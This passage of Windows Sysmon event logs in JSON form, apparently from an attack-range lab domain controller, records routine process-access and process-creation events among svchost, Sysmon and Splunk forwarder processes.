05:53:53.893","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5826,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.893\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0371-5F25-0000-0010B6E20A00}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.893","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0371-5F25-0000-0010B6E20A00}","TargetProcessId":"4728","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5827,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.034\r\nSourceProcessGUID: {A837DB8D-0371-5F25-0000-0010B6E20A00}\r\nSourceProcessId: 4728\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.034","SourceProcessGUID":"{A837DB8D-0371-5F25-0000-0010B6E20A00}","SourceProcessId":"4728","SourceThreadId":"3272","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5828,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.442\r\nProcessGuid: {A837DB8D-0372-5F25-0000-00108BE40A00}\r\nProcessId: 4660\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.442","ProcessGuid":"{A837DB8D-0372-5F25-0000-00108BE40A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5829,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0372-5F25-0000-00108BE40A00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0372-5F25-0000-00108BE40A00}","TargetProcessId":"4660","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5830,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0372-5F25-0000-00108BE40A00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0372-5F25-0000-00108BE40A00}","TargetProcessId":"4660","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5831,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5832,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5833,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5834,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed 